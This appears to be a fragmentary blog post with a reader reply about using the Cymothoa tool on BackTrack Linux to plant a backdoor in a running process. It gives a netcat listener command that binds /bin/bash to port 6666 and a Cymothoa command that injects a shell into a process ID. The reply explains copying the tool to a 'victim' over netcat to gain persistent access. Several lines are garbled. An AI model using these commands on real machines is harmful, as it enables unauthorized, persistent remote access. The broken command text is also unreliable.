open the tools cymothoa which located in Apps - Maintaining Access - OS Backdoors - Cymothoa
typed a command root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 6666 -e> cy /bin/bash
open the cymothoa now
cymothoain ubuntu
command ps -aux
I do it with command ./cymothoa -p 1154 -s 0 -y 6666 and the result is
It suppose like this
BalasHapusyou copy the cymothoa from BT to victim using nc, here the hint "transfer file with nc". after you successfully transfer cymothoa to victim, now run nc again to connect fom BT to victim, and execute the cymothoa, now you already have 3 ways, normal login, nc and cymothoa. good luck!